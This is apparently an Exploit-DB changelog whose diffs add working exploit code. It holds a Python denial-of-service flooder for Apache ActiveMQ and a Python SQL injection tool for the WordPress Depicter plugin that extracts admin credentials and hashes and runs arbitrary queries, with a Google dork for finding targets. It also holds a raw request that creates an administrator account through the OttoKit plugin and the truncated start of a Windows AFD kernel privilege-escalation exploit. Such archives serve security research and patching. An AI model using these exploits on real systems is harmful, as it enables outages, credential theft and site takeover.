DB: 2025-05-10

6 changes to exploits/shellcodes/ghdb

Apache ActiveMQ 6.1.6 - Denial of Service (DOS)

SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation

WordPress Depicter Plugin 3.6.1 - SQL Injection

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

VirtualBox 7.0.16 - Privilege Escalation

exploits/multiple/remote/52288.py

@@ -0,0 +1,262 @@
+# Exploit Title: Apache ActiveMQ 6.1.6 - Denial of Service (DOS)
+# Date: 2025-05-9
+# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
+# Github: https://github.com/absholi7ly/CVE-2025-27533-Exploit-for-Apache-ActiveMQ
+# CVE: CVE-2025-27533
+
+import socket
+import struct
+import time
+import datetime
+import threading
+import requests
+import argparse
+import random
+from colorama import init, Fore
+from tabulate import tabulate
+from tqdm import tqdm
+from concurrent.futures import ThreadPoolExecutor
+
+init()
+
+def print_banner():
+    banner = f"""
+{Fore.CYAN}============================================================
+        CVE-2025-27533 Exploit PoC - Apache ActiveMQ DoS
+============================================================
+{Fore.YELLOW}Developed by: absholi7ly
+{Fore.CYAN}============================================================{Fore.RESET}
+    """
+    print(banner)
+
+def _check_server_availability(host, port, admin_port=8161, timeout=2):
+    """Internal function to check server availability"""
+    tcp_reachable = False
+    admin_reachable = False
+
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.settimeout(timeout)
+        sock.connect((host, port))
+        sock.close()
+        tcp_reachable = True
+    except (socket.timeout, ConnectionRefusedError):
+        pass
+
+    try:
+        response = requests.get(f"http://{host}:{admin_port}/admin", timeout=timeout)
+        admin_reachable = response.status_code == 200
+    except (requests.Timeout, requests.ConnectionError):
+        pass
+
+    return tcp_reachable, admin_reachable
+
+def check_server_availability(host, port, admin_port=8161, timeout=2, retries=5):
+    for _ in range(retries):
+        tcp_reachable, admin_reachable = _check_server_availability(host, port, admin_port, timeout)
+        if not tcp_reachable:
+            return False, admin_reachable
+        time.sleep(0.5)
+    return True, admin_reachable
+
+def parse_hex_or_int(value):
+    try:
+        if value.startswith('0x') or value.startswith('0X'):
+            return int(value, 16)
+        return int(value)
+    except ValueError:
+        raise ValueError(f"Invalid integer or hex value: {value}")
+
+def create_malicious_packet(buffer_size=0x1E00000, packet_id=1):
+    command_type = 0x01
+    client_id = f"EXPLOIT-PACKET-{packet_id:04d}".encode()
+    version = 12
+
+    packet = bytearray()
+    packet += b'\x00\x00\x00\x00'
+    packet += struct.pack("B", command_type)
+    packet += struct.pack(">I", len(client_id))
+    packet += client_id
+    packet += struct.pack(">I", version)
+    packet += struct.pack(">I", buffer_size)
+    packet += bytes(random.randint(0, 255) for _ in range(50))
+
+    packet_length = len(packet) - 4
+    packet[0:4] = struct.pack(">I", packet_length)
+
+    return packet
+
+def send_single_packet(host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event):
+    if stop_event.is_set():
+        return
+
+    timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
+    tcp_reachable, admin_reachable = check_server_availability(host, port)
+    status = f"TCP: {'Up' if tcp_reachable else 'Down'}, Admin: {'Up' if admin_reachable else 'Down'}"
+    local_port = "N/A"
+    connection_status = "Success"
+
+    max_connect_retries = 5
+    for connect_attempt in range(max_connect_retries):
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.settimeout(5)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
+
+        try:
+            sock.connect((host, port))
+            local_port = sock.getsockname()[1]
+            print(f"{Fore.GREEN}[+] Connected to {host}:{port} (Packet {packet_num}/{total_packets}, Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")
+
+            max_retries = 3
+            for attempt in range(max_retries):
+                try:
+                    sock.send(packet)
+                    print(f"{Fore.CYAN}[*] Sent Packet {packet_num}/{total_packets} (Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")
+                    try:
+                        response = sock.recv(2048)
+                        response_len = len(response)
+                        connection_status = f"Success (Response: {response_len} bytes)"
+                    except:
+                        connection_status = "Success (No Response)"
+                    break
+                except socket.error as e:
+                    connection_status = f"Failed: {str(e)}"
+                    if attempt < max_retries - 1:
+                        print(f"{Fore.YELLOW}[-] Failed to send Packet {packet_num}/{total_packets} (Attempt {attempt+1}, Port: {local_port}): {e}. Retrying...{Fore.RESET}")
+                        time.sleep(0.5)
+                        continue
+                    else:
+                        print(f"{Fore.RED}[-] Failed to send Packet {packet_num}/{total_packets} after {max_retries} attempts: {e}{Fore.RESET}")
+
+            packet_status.append([packet_num, timestamp, status, local_port, f"Packet-{packet_num:04d}", connection_status])
+            break
+
+        except socket.timeout:
+            print(f"{Fore.RED}[-] Connection timeout for Packet {packet_num}/{total_packets} (Port: {local_port}){Fore.RESET}")
+            packet_status.append([packet_num, timestamp, "Connection Timeout", local_port, f"Packet-{packet_num:04d}", "Timeout"])
+            break
+        except socket.error as e:
+            error_str = str(e)
+            if "10053" in error_str:
+                error_type = "Connection Reset"
+            elif "timeout" in error_str:
+                error_type = "Timeout"
+            else:
+                error_type = "Other"
+            if "10053" in error_str and connect_attempt < max_connect_retries - 1:
+                print(f"{Fore.YELLOW}[-] [WinError 10053] for Packet {packet_num}/{total_packets} (Attempt {connect_attempt+1}): {e}. Retrying connection...{Fore.RESET}")
+                time.sleep(1)
+                continue
+            print(f"{Fore.RED}[-] Error connecting for Packet {packet_num}/{total_packets} (Port: {local_port}): {e}{Fore.RESET}")
+            packet_status.append([packet_num, timestamp, f"Error: {error_type}", local_port, f"Packet-{packet_num:04d}", f"Error: {error_str}"])
+            break
+
+        finally:
+            sock.close()
+
+    packet = None
+
+def send_packets(host, port, total_packets=2000, buffer_sizes=[0x1E00000, 0x3200000]):
+    packet_status = []
+    stop_event = threading.Event()
+    max_threads = 2
+
+    pbar = tqdm(total=total_packets, desc="Sending Packets", unit="packet")
+
+    def monitor_server():
+        while not stop_event.is_set():
+            tcp_reachable, _ = check_server_availability(host, port)
+            if not tcp_reachable:
+                print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
+                stop_event.set()
+                break
+            time.sleep(1)
+
+    monitor_thread = threading.Thread(target=monitor_server)
+    monitor_thread.start()
+
+    packet_num = 1
+    with ThreadPoolExecutor(max_workers=max_threads) as executor:
+        futures = []
+        while packet_num <= total_packets and not stop_event.is_set():
+            buffer_size = random.choice(buffer_sizes)
+            packet = create_malicious_packet(buffer_size, packet_num)
+            future = executor.submit(
+                send_single_packet,
+                host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event
+            )
+            futures.append(future)
+            packet_num += 1
+            pbar.update(1)
+            time.sleep(random.uniform(0.3, 0.5))
+
+            if packet_num % 50 == 0:
+                tcp_reachable, _ = check_server_availability(host, port)
+                time.sleep(2)
+                if not tcp_reachable:
+                    print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
+                    stop_event.set()
+                    break
+                print(f"{Fore.MAGENTA}[*] {packet_num} packets sent,{Fore.RESET}")
+
+    pbar.close()
+    stop_event.set()
+    monitor_thread.join()
+
+    packet_status.sort(key=lambda x: x[0])
+
+    total_sent = len(packet_status)
+    successful = sum(1 for p in packet_status if p[5].startswith("Success"))
+    failed = total_sent - successful
+
+    print(f"\n{Fore.CYAN}[*] Packet Status Table:{Fore.RESET}")
+    print(tabulate(
+        packet_status,
+        headers=["Packet #", "Timestamp", "Server Status", "Local Port", "Packet ID", "Connection"],
+        tablefmt="fancy_grid",
+        stralign="center",
+        numalign="center"
+    ))
+
+    print(f"\n{Fore.CYAN}[*] Exploit Statistics:{Fore.RESET}")
+    print(f"  - Total Packets Sent: {total_sent}")
+    print(f"  - Successful Packets: {successful} ({successful/total_sent*100:.2f}%)")
+    print(f"  - Failed Packets: {failed} ({failed/total_sent*100:.2f}%)")
+
+    tcp_reachable, admin_reachable = check_server_availability(host, port)
+    print(f"\n{Fore.CYAN}[*] Final Server Status:{Fore.RESET}")
+    if not tcp_reachable:
+        print(f"{Fore.GREEN}[+] Exploit Successful: TCP port {port} is down!{Fore.RESET}")
+    else:
+        print(f"{Fore.YELLOW}[-] Exploit Incomplete: TCP port {port} still up.{Fore.RESET}")
+
+    return packet_status
+
+def main():
+    print_banner()
+
+    parser = argparse.ArgumentParser(description="CVE-2025-27533 Exploit PoC for Apache ActiveMQ")
+    parser.add_argument("--host", default="127.0.0.1", help="Target IP address")
+    parser.add_argument("--port", type=int, default=61616, help="OpenWire port")
+    parser.add_argument("--total-packets", type=int, default=2000, help="Total packets to send")
+    parser.add_argument("--buffer-sizes", type=parse_hex_or_int, nargs='+', default=[0x1E00000, 0x3200000],
+                        help="Buffer sizes in bytes (decimal or hex)")
+
+    args = parser.parse_args()
+
+    print(f"{Fore.CYAN}[*] Exploit Configuration:{Fore.RESET}")
+    print(f"  - Target: {args.host}:{args.port}")
+    print(f"  - Total Packets: {args.total_packets}")
+    print(f"  - Buffer Sizes: {[f'{size:#x} ({size // (1024*1024)} MB)' for size in args.buffer_sizes]}")
+
+    print(f"\n{Fore.CYAN}[*] Sending malicious packets...{Fore.RESET}")
+    packet_status = send_packets(args.host, args.port, args.total_packets, args.buffer_sizes)
+
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        print(f"{Fore.RED}[-] Program interrupted by user.{Fore.RESET}")

exploits/multiple/webapps/52285.py

@@ -0,0 +1,232 @@
+# Exploit Title: WordPress Depicter Plugin 3.6.1 - SQL Injection
+# Google Dork: inurl:/wp-content/plugins/depicter/
+# Date: 2025-05-06
+# Exploit Author: Andrew Long (datagoboom)
+# Vendor Homepage: https://wordpress.org/plugins/depicter/
+# Software Link: https://downloads.wordpress.org/plugin/depicter.3.6.1.zip
+# Version: <= 3.6.1
+# Tested on: WordPress 6.x
+# CVE: CVE-2025-2011
+
+# Description:
+# The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 3.6.1.
+# The vulnerability exists due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
+# This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+# The vulnerability is located in the admin-ajax.php endpoint and can be exploited through the 's' parameter. The PoC demonstrates how to:
+# 1. Check if a target is vulnerable
+# 2. Extract admin user details
+# 3. Execute custom SQL queries
+
+# The exploit is provided as a Python script (poc.py) that includes:
+# - Error-based SQL injection detection
+# - Admin user information extraction
+# - Custom SQL query execution capability
+# - Debug mode for detailed output
+
+
+#!/usr/bin/env python3
+
+import argparse
+import re
+import sys
+import time
+import html
+import urllib.parse
+from urllib.parse import urlparse
+
+try:
+    import requests
+    from colorama import Fore, Style, init
+    init(autoreset=True)
+    USE_COLOR = True
+except ImportError:
+    class MockColorama:
+        def __getattr__(self, name):
+            return ""
+
+    Fore = Style = MockColorama()
+    USE_COLOR = False
+
+    print("[!] Missing dependencies. Install with: pip install requests colorama")
+    print("[!] Continuing without colored output...")
+
+def print_banner():
+    banner = f"""
+{Fore.CYAN}╔════════════════════════════════════════════════════════════════╗
+{Fore.CYAN}║ {Fore.RED}CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder <3.6.2 {Fore.CYAN}║
+{Fore.CYAN}║ {Fore.GREEN}By datagoboom                                          {Fore.CYAN}        ║
+{Fore.CYAN}╚════════════════════════════════════════════════════════════════╝{Style.RESET_ALL}
+    """
+    print(banner)
+
+def verify_target(url):
+    parsed_url = urlparse(url)
+    if not parsed_url.scheme:
+        url = "http://" + url
+    if url.endswith('/'):
+        url = url[:-1]
+
+    print(f"{Fore.YELLOW}[*] Target URL: {url}")
+    return url
+
+def test_connection(url):
+    try:
+        response = requests.get(url, timeout=10)
+        if response.status_code == 200:
+            print(f"{Fore.GREEN}[+] Successfully connected to the target")
+            return True
+        else:
+            print(f"{Fore.RED}[-] Received status code {response.status_code}")
+            return False
+    except requests.exceptions.RequestException as e:
+        print(f"{Fore.RED}[-] Connection error: {e}")
+        return False
+
+def extract_data(url, sql_query, max_length=50, debug=False):
+    payload = f"test%' AND EXTRACTVALUE(1,CONCAT(0x7e,({sql_query}),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
+
+    target_url = f"{url}/wp-admin/admin-ajax.php?s={payload}"
+
+    try:
+        if debug:
+            print(f"{Fore.BLUE}[DEBUG] Requesting: {target_url}")
+
+        response = requests.get(target_url, timeout=20)
+
+        if debug:
+            print(f"{Fore.BLUE}[DEBUG] Response status: {response.status_code}")
+
+        decoded_text = html.unescape(response.text)
+
+        error_pattern = r"XPATH syntax error: '~(.*?)~'"
+        match = re.search(error_pattern, decoded_text)
+
+        if match:
+            extracted_data = match.group(1)
+            return extracted_data
+        else:
+            if debug:
+                print(f"{Fore.RED}[-] No XPATH syntax error found in response")
+                if "XPATH syntax error" in decoded_text:
+                    print(f"{Fore.RED}[-] XPATH error found but regex didn't match. Response excerpt:")
+                    print(f"{Fore.RED}[-] {decoded_text[:500]}")
+                else:
+                    print(f"{Fore.RED}[-] Response doesn't contain XPATH error. Response excerpt:")
+                    print(f"{Fore.RED}[-] {decoded_text[:500]}")
+            return None
+    except requests.exceptions.RequestException as e:
+        print(f"{Fore.RED}[-] Error during extraction: {e}")
+        return None
+
+def check_vulnerability(url, debug=False):
+    print(f"{Fore.YELLOW}[*] Checking if the target is vulnerable...")
+
+    result = extract_data(url, "database()", debug=debug)
+
+    if result:
+        print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
+        print(f"{Fore.GREEN}[+] Database name: {result}")
+        return True
+    else:
+        result = extract_data(url, "VERSION()", debug=debug)
+        if result:
+            print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
+            print(f"{Fore.GREEN}[+] MySQL version: {result}")
+            return True
+        else:
+            result = extract_data(url, "'test'", debug=debug)
+            if result:
+                print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
+                print(f"{Fore.GREEN}[+] Test value: {result}")
+                return True
+            else:
+                print(f"{Fore.RED}[-] Target does not appear to be vulnerable")
+                manual_check = f"{url}/wp-admin/admin-ajax.php?s=test%' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
+                print(f"{Fore.YELLOW}[*] Try checking manually in your browser: \n{manual_check}")
+                return False
+
+def extract_admin_details(url, debug=False):
+    print(f"{Fore.YELLOW}[*] Extracting admin user details...")
+
+    admin_username = extract_data(url, "SELECT user_login FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
+
+    if admin_username:
+        print(f"{Fore.GREEN}[+] Admin username: {admin_username}")
+
+        admin_email = extract_data(url, "SELECT user_email FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
+        if admin_email:
+            print(f"{Fore.GREEN}[+] Admin email: {admin_email}")
+
+        hash_left = extract_data(url, "SELECT LEFT(user_pass,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
+        if hash_left:
+            hash_right = extract_data(url, "SELECT SUBSTRING(user_pass,31,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
+            if hash_right:
+                full_hash = hash_left + hash_right
+            else:
+                print(f"{Fore.YELLOW}[*] Could not retrieve full hash - bcrypt hashes are typically 60 chars long")
+            print(f"{Fore.GREEN}[+] Admin password hash: {full_hash}")
+        else:
+            print(f"{Fore.RED}[-] Failed to extract admin password hash")
+
+        return {
+            "username": admin_username,
+            "email": admin_email,
+            "password_hash": hash_left
+        }
+    else:
+        print(f"{Fore.RED}[-] Failed to extract admin details")
+        return None
+
+def extract_custom_data(url, query, debug=False):
+    print(f"{Fore.YELLOW}[*] Executing custom SQL query...")
+    print(f"{Fore.YELLOW}[*] Query: {query}")
+
+    result = extract_data(url, query, debug=debug)
+
+    if result:
+        print(f"{Fore.GREEN}[+] Result: {result}")
+        return result
+    else:
+        print(f"{Fore.RED}[-] Failed to execute query or no results returned")
+        return None
+
+def main():
+    parser = argparse.ArgumentParser(description='CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder')
+    parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
+    parser.add_argument('-m', '--mode', default='check', choices=['check', 'admin', 'custom'],
+                      help='Extraction mode: check=vulnerability check, admin=admin details, custom=custom SQL query')
+    parser.add_argument('-q', '--query', help='Custom SQL query (use with -m custom)')
+    parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output')
+
+    args = parser.parse_args()
+
+    print_banner()
+
+    target_url = verify_target(args.url)
+
+    if not test_connection(target_url):
+        print(f"{Fore.RED}[-] Exiting due to connection failure")
+        sys.exit(1)
+
+    if not check_vulnerability(target_url, debug=args.debug):
+        if args.mode != 'check':
+            print(f"{Fore.YELLOW}[!] Target may not be vulnerable, but continuing with requested mode...")
+        else:
+            print(f"{Fore.RED}[-] Exiting as target does not appear to be vulnerable")
+            sys.exit(1)
+
+    if args.mode == 'check':
+        pass
+    elif args.mode == 'admin':
+        extract_admin_details(target_url, debug=args.debug)
+    elif args.mode == 'custom':
+        if not args.query:
+            print(f"{Fore.RED}[-] Custom mode requires a SQL query (-q/--query)")
+            sys.exit(1)
+        extract_custom_data(target_url, args.query, debug=args.debug)
+
+    print(f"\n{Fore.YELLOW}[!] Exploitation complete")
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52286.txt

@@ -0,0 +1,33 @@
+ # Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
+# Date: 2025-05-7
+# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
+
+# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
+
+Conditions for Exploitation
+<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>
+
+The vulnerability can be exploited under the following circumstances:
+
+   1. OttoKit must be installed and activated on the target WordPress site.
+   2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
+   in the database).
+   3. The target site displays the REST API endpoint
+   '/wp-json/sure-triggers/v1/automation/action'.
+
+------------------------------
+HTTP Request
+<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
+The following request targets the
+/wp-json/sure-triggers/v1/automation/action endpoint to create an
+administrator account:
+
+POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
+Host: [target-site]
+Content-Type: application/x-www-form-urlencoded
+St-Authorization:
+Content-Length: [length]
+
+selected_options[user_name]=new_admin&selected_options[user_email]=
+attacker@example.com&selected_options[password]=StrongP@ssw0rd123
+&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists

exploits/windows/local/52284.C++

@@ -0,0 +1,883 @@
+# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
+# Date: 2025-05-05
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Tested on: Win x64
+# CVE : CVE-2024-38193
+
+#pragma once
+
+#include "ntstatus.h"
+#include "Windows.h"
+#include <iostream>
+
+#pragma comment(lib, "ntdll.lib")
+
+
+#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
+#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
+
+#define AfdOpenPacket "AfdOpenPacketXX"
+#define AFD_DEVICE_NAME L"\\Device\\Afd"
+#define LOCALHOST "127.0.0.1"
+
+
+#define IOCTL_AFD_BIND 0x12003LL
+#define IOCTL_AFD_LISTEN 0x1200BLL
+#define IOCTL_AFD_CONNECT 0x120BBLL
+#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
+#define FSCTL_PIPE_PEEK 0x11400CLL
+#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
+#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
+
+#define OBJ_CASE_INSENSITIVE 0x00000040
+#define OBJ_INHERIT 0x00000002
+#define FILE_OPEN_IF 0x3
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+
+#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
+#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
+#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
+#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
+#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
+#define PREVIOUS_MODE_OFFSET 0x232
+#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
+#define OFFSET_TO_TOKEN 0x4b8
+#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
+
+
+typedef struct IO_STATUS_BLOCK
+{
+    union
+    {
+        DWORD Status;
+        PVOID Pointer;
+    };
+
+    DWORD* Information;
+};
+
+//0x4 bytes (sizeof)
+struct _SYSTEM_POWER_STATE_CONTEXT
+{
+    union
+    {
+        struct
+        {
+            ULONG Reserved1 : 8; //0x0
+            ULONG TargetSystemState : 4; //0x0
+            ULONG EffectiveSystemState : 4; //0x0
+            ULONG CurrentSystemState : 4; //0x0
+            ULONG IgnoreHibernationPath : 1; //0x0
+            ULONG PseudoTransition : 1; //0x0
+            ULONG KernelSoftReboot : 1; //0x0
+            ULONG DirectedDripsTransition : 1; //0x0
+            ULONG Reserved2 : 8; //0x0
+        };
+        ULONG ContextAsUlong; //0x0
+    };
+};
+
+//0x4 bytes (sizeof)
+union _POWER_STATE
+{
+    enum _SYSTEM_POWER_STATE SystemState; //0x0
+    enum _DEVICE_POWER_STATE DeviceState; //0x0
+};
+
+//0x48 bytes (sizeof)
+typedef struct _IO_STACK_LOCATION
+{
+    UCHAR MajorFunction; //0x0
+    UCHAR MinorFunction; //0x1
+    UCHAR Flags; //0x2
+    UCHAR Control; //0x3
+    union
+    {
+        struct
+        {
+            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
+            ULONG Options; //0x10
+            USHORT FileAttributes; //0x18
+            USHORT ShareAccess; //0x1a
+            ULONG EaLength; //0x20
+        } Create; //0x8
+        struct
+        {
+            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
+            ULONG Options; //0x10
+            USHORT Reserved; //0x18
+            USHORT ShareAccess; //0x1a
+            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
+        } CreatePipe; //0x8
+        struct
+        {
+            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
+            ULONG Options; //0x10
+            USHORT Reserved; //0x18
+            USHORT ShareAccess; //0x1a
+            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
+        } CreateMailslot; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            ULONG Key; //0x10
+            ULONG Flags; //0x14
+            union _LARGE_INTEGER ByteOffset; //0x18
+        } Read; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            ULONG Key; //0x10
+            ULONG Flags; //0x14
+            union _LARGE_INTEGER ByteOffset; //0x18
+        } Write; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            struct _UNICODE_STRING* FileName; //0x10
+            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
+            ULONG FileIndex; //0x20
+        } QueryDirectory; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            ULONG CompletionFilter; //0x10
+        } NotifyDirectory; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            ULONG CompletionFilter; //0x10
+            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
+DirectoryNotifyInformationClass; //0x18
+        } NotifyDirectoryEx; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
+        } QueryFile; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
+            struct _FILE_OBJECT* FileObject; //0x18
+            union
+            {
+                struct
+                {
+                    UCHAR ReplaceIfExists; //0x20
+                    UCHAR AdvanceOnly; //0x21
+                };
+                ULONG ClusterCount; //0x20
+                VOID* DeleteHandle; //0x20
+            };
+        } SetFile; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            VOID* EaList; //0x10
+            ULONG EaListLength; //0x18
+            ULONG EaIndex; //0x20
+        } QueryEa; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+        } SetEa; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            enum _FSINFOCLASS FsInformationClass; //0x10
+        } QueryVolume; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            enum _FSINFOCLASS FsInformationClass; //0x10
+        } SetVolume; //0x8
+        struct
+        {
+            ULONG OutputBufferLength; //0x8
+            ULONG InputBufferLength; //0x10
+            ULONG FsControlCode; //0x18
+            VOID* Type3InputBuffer; //0x20
+        } FileSystemControl; //0x8
+        struct
+        {
+            union _LARGE_INTEGER* Length; //0x8
+            ULONG Key; //0x10
+            union _LARGE_INTEGER ByteOffset; //0x18
+        } LockControl; //0x8
+        struct
+        {
+            ULONG OutputBufferLength; //0x8
+            ULONG InputBufferLength; //0x10
+            ULONG IoControlCode; //0x18
+            VOID* Type3InputBuffer; //0x20
+        } DeviceIoControl; //0x8
+        struct
+        {
+            ULONG SecurityInformation; //0x8
+            ULONG Length; //0x10
+        } QuerySecurity; //0x8
+        struct
+        {
+            ULONG SecurityInformation; //0x8
+            VOID* SecurityDescriptor; //0x10
+        } SetSecurity; //0x8
+        struct
+        {
+            struct _VPB* Vpb; //0x8
+            struct _DEVICE_OBJECT* DeviceObject; //0x10
+        } MountVolume; //0x8
+        struct
+        {
+            struct _VPB* Vpb; //0x8
+            struct _DEVICE_OBJECT* DeviceObject; //0x10
+        } VerifyVolume; //0x8
+        struct
+        {
+            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
+        } Scsi; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+            VOID* StartSid; //0x10
+            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
+            ULONG SidListLength; //0x20
+        } QueryQuota; //0x8
+        struct
+        {
+            ULONG Length; //0x8
+        } SetQuota; //0x8
+        struct
+        {
+            enum _DEVICE_RELATION_TYPE Type; //0x8
+        } QueryDeviceRelations; //0x8
+        struct
+        {
+            struct _GUID* InterfaceType; //0x8
+            USHORT Size; //0x10
+            USHORT Version; //0x12
+            struct _INTERFACE* Interface; //0x18
+            VOID* InterfaceSpecificData; //0x20
+        } QueryInterface; //0x8
+        struct
+        {
+            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
+        } DeviceCapabilities; //0x8
+        struct
+        {
+            struct _IO_RESOURCE_REQUIREMENTS_LIST*
+IoResourceRequirementList; //0x8
+        } FilterResourceRequirements; //0x8
+        struct
+        {
+            ULONG WhichSpace; //0x8
+            VOID* Buffer; //0x10
+            ULONG Offset; //0x18
+            ULONG Length; //0x20
+        } ReadWriteConfig; //0x8
+        struct
+        {
+            UCHAR Lock; //0x8
+        } SetLock; //0x8
+        struct
+        {
+            enum BUS_QUERY_ID_TYPE IdType; //0x8
+        } QueryId; //0x8
+        struct
+        {
+            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
+            ULONG LocaleId; //0x10
+        } QueryDeviceText; //0x8
+        struct
+        {
+            UCHAR InPath; //0x8
+            UCHAR Reserved[3]; //0x9
+            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
+        } UsageNotification; //0x8
+        struct
+        {
+            enum _SYSTEM_POWER_STATE PowerState; //0x8
+        } WaitWake; //0x8
+        struct
+        {
+            struct _POWER_SEQUENCE* PowerSequence; //0x8
+        } PowerSequence; //0x8
+        struct
+        {
+            union
+            {
+                ULONG SystemContext; //0x8
+                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
+//0x8
+            };
+            enum _POWER_STATE_TYPE Type; //0x10
+            union _POWER_STATE State; //0x18
+            enum POWER_ACTION ShutdownType; //0x20
+        } Power; //0x8
+        struct
+        {
+            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
+            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
+        } StartDevice; //0x8
+        struct
+        {
+            ULONGLONG ProviderId; //0x8
+            VOID* DataPath; //0x10
+            ULONG BufferSize; //0x18
+            VOID* Buffer; //0x20
+        } WMI; //0x8
+        struct
+        {
+            VOID* Argument1; //0x8
+            VOID* Argument2; //0x10
+            VOID* Argument3; //0x18
+            VOID* Argument4; //0x20
+        } Others; //0x8
+    } Parameters; //0x8
+    struct _DEVICE_OBJECT* DeviceObject; //0x28
+    struct _FILE_OBJECT* FileObject; //0x30
+    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
+arg2, VOID* arg3); //0x38
+    VOID* Context; //0x40
+}IO_STACK_LOCATION;
+
+//0x18 bytes (sizeof)
+struct _KDEVICE_QUEUE_ENTRY
+{
+    struct _LIST_ENTRY DeviceListEntry; //0x0
+    ULONG SortKey; //0x10
+    UCHAR Inserted; //0x14
+};
+
+//0x58 bytes (sizeof)
+struct _KAPC
+{
+    UCHAR Type; //0x0
+    UCHAR AllFlags; //0x1
+    UCHAR Size; //0x2
+    UCHAR SpareByte1; //0x3
+    ULONG SpareLong0; //0x4
+    struct _KTHREAD* Thread; //0x8
